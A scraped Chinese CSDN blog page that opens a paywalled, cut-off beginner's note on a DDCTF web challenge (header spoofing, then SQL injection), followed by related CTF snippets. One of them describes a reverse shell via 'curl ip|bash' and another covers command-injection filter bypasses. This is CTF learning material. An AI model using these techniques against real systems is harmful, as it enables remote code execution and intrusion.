一道CTF题学习php的curl扩展模块

最新推荐文章于 2023-04-18 16:43:02 发布
最新推荐文章于 2023-04-18 16:43:02 发布
阅读量4.2k 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bj5716/article/details/80512626
版权

前言

作为一个web安全学的很痛苦,还始终学不会的人,决定要好好学web安全了。这次见识了一下DDCTF的题目,难度对于我来说非常高,所以决定写一些学习总结,也不算wp,就是笔记这种吧,这篇文章以学习PHP的CURL模块为主,用这道很基础的SQL注入题来引一下子。

题目描述


一出来什么都没有,只有一个这个提示。

所以说,这个就下意识改一下头吧,添加一个X-Forwarded-For项就可以了对吧。


而且这个只能这样改,不能在Raw标签里面直接打上去,我就吃了这个亏的。

即使改完了没什么不同。


就这样,然后就进入了真实页面。


不用说,这个对于我来说结合题目也就只有SQL注入的可能了。

不过现在问题来了,这个注入需要改请求头,不然无法访问真实页面。

这里我的思路有:第一,写一

最低0.47元/天 解锁文章
bj9532
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
CTF命令执行目解思路
悦分享
08-02 747
可以看到该文件有curl xx.x.x.x|bash字符,在linux下输入任意一个字符后加\是不会中断当前操作,可以继续输入内容。而后面没有\则会中断,而sh可以在报错的情况下依然会执行可以执行的命令,因此不会影响curl的执行。在自己服务器中放入bash一句话,利用curl ip|bash反弹shell。ls -t >g是倒序输出文件名字,然后sh _执行此文件,写入到g中。原理就是利用curl ip|bash等很多方式去反弹shell。利用linux下特有的命令来写入shell反弹。...
CTF中的curl命令
qq_52988816的博客
02-23 3178
简单理解curl命令,顺便看看在ctf中咋出
ctf---curl的使用
weixin_43803070的博客
05-12 5166
** bugku-web基础$_GET ** curl http://123.206.87.240:8002/get/?what=flag curl -I http://123.206.87.240:8002/get/ ** bugku-web基础$_POST ** curl -X POST http://123.206.87.240:8002/post/ -d "what=flag...
CTF笔记 攻防世界 fakebook
qq_51248658的博客
10-10 1276
第一次做,拿到目一开始就被注册难住了,blog该填啥???于是忍不住直接就去看wp了。。。。。。后面过了一段时间再去做发现,除了注册,后面还是没有思路,只是隐约记得有个反序列化。。。。这里就记一下,加深以下印像。第一次认真跟着大佬的wp一步步做下来,学到了很多,sql注入那里还是有些薄弱,判断闭合的时候总想不到直接空格,多积累吧。。。。
CTF之WEB学习——http请求方式
weixin_61167540的博客
11-21 747
是常用的命令行工具,用来请求 Web 服务器。它的名字就是客户端(client)的 URL 工具的意思。得到flag:ctfhub{c58e45f39e52486f411345e0}从目中可以看出,需要使用的一种是CTFHUB 的请求方式才能拿到flag。参考各位大佬们的做法是用windows自带的curl——指定HTTP请求方法。这是这个的解重点。未指定请求方式默认为GET。
CTF之命令执行常见绕过
qq_42383069的博客
04-18 5163
在 linux 下表示分隔符,只有cat$IFSa.txt 的时候, bash 解释器会把整个 IFSa当做变量名,所以导致没有办法运行,然而如果加一个 {} 就固定了变量名,同理在后面加个 $ 可以起到截断的作用,而 $9 指的是当前系统shell 进程的第九个参数的持有者,就是一个空字符串,因此 $9 相当于没有加东西,等于做了一个前后隔离。]有一个重要的区别,当匹配的文件不存在,[…通过测试,可见程序过滤了截断符,根据以上的知识,我们来fuzz一下可用的截断符。根据burp爆破,发现可以通过。
一道CTF学习PHP反序列化漏洞-附件资源
03-02
一道CTF学习PHP反序列化漏洞-附件资源
CTF库超详细资源合集
06-14
在传统的CTF线上⽐赛中,Web类⽬是主要的型之⼀,相较于⼆进制、逆向等类型的⽬,参赛者不需掌握系统底层知识;相较于密码学、杂项问,不需具特别强的编程能⼒,故⼊门较为容易。Web类⽬常见的漏洞类型...
CTF-100.-天天练习-学习
11-01
CTF-100.-----------------天天练习------------------学习 100小,试例练习
ctfCTF理论考核及答案
07-05
如果服务器禁止上传.php文件,尝试上传123.php或其他变体可能会被阻止,除非扩展名被绕过。选项A是不能成功上传的方式,因为它没有尝试任何绕过策略。 4. **文件上传漏洞的绕过方法**:A、B、D选项描述了常见的文件...
关于CTFhub中的HTTP请求方式关于curl命令
cisansui的博客
09-25 682
CTFHub HTTP请求方式 百度了一下找到了解方法 使用 Windows 自带的cmd命令行中的 curl命令 cu rl -v -X CTFHUB URL 输入这个命令,网址的详细信息包括在下边,在html的源代码里面找出flag就行 关于curl命令 cURL是一个利用URL语法在命令行下工作的文件传输工具,1997年首次发行。它支持文件上传和下载,所以是综合传输工具 url用来‘从server传输数据’或者‘传输数据到server’,支持多种协议(HTTP, HTTPS, FTP, FT
攻防世界web目记录(一)
wanan的博客
10-06 2855
攻防世界web目记录(一)
CTFHUB HTTP请求方式(curl
weixin_42501869的博客
09-18 414
目 从目中可以看出,需要使用的一种是CTFHUB 的请求方式才能拿到flag 解法: 通过使用windows自带的工具curl curl用法: curl -v -X CTFHUB http://challenge-dd9dc5df40b8be18.sandbox.ctfhub.com:10800/index.php 如此,我们就需要去了解这几个参数的作用: -v 显示整个通信的过程 -X 指定HTTP请求方法。这是这个的解重点。 未指定请求方式默认为GET curl -v http://challe
XCTF(攻防世界)—进阶webWrite Up(一)
Lemon's blog
08-20 1659
前言:这段时间做了一些XCTF的web进阶,真的是学习到了很多知识,就来总结一下。 Cat 一开始以为是命令注入,恰好最近学习了命令注入,就先来测试一下: 输入127.0.0.1,发现是可以ping通的 输入127.0.0.1 | phpinfo() 或127.0.0.1 & net user就会显示: Invalid URL 看来命令注入的方法是行不通的(其他连接符也被过滤了,如...
四个有关文件传输的CTF WEB(深育杯FakeWget、极客大挑战where_is_my_FUMO、2021陇原战疫CheckIN、N1CTF-curl trick)
Love&Share
11-27 2700
文章目录深育杯FakeWget极客大挑战where_is_my_FUMO2021陇原战疫CheckINN1CTF-curl trick 前两wp来自官方发布,觉得这四个挺有意思的所以整理了下 深育杯FakeWget 目只有三个路由,一个输入点,容易判断考点是命令注入,因此需要先不断测试传入数据并刷新观察回显,来猜测后端与wget命令拼接逻辑和过滤逻辑,下面是三个比较典型的fuzz示例: www.baidu.com teststr with space www.baidu.com这里fuzz出.
Linux - 一篇带你读懂 Curl Proxy 代理模式
牧码的博客
07-28 5714
curl是一个很有名的处理网络请求的类Unix工具。出于某种原因,我们进行网络请求,需要设置代理。本文讲全面介绍如何为curl设置代理。
攻防世界之Web新手练习篇
m0_63944500的博客
11-19 2232
写给刚接触CTF的萌新,感谢支持,谨以此文献给去年的自己。
SECCON CTF 2022 web复现
shinygod的博客
11-20 783
SECCON CTF 2022 web复现
CTF curl
最新发布
08-16
关于使用curlCTF目,可以提供一些常见的解思路。请注意,这只是一种方法,具体解方式可能因目而异。 首先,curl是一个命令行工具,用于发送HTTP请求。在CTF中,你可能会遇到需要使用curl来与服务器...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值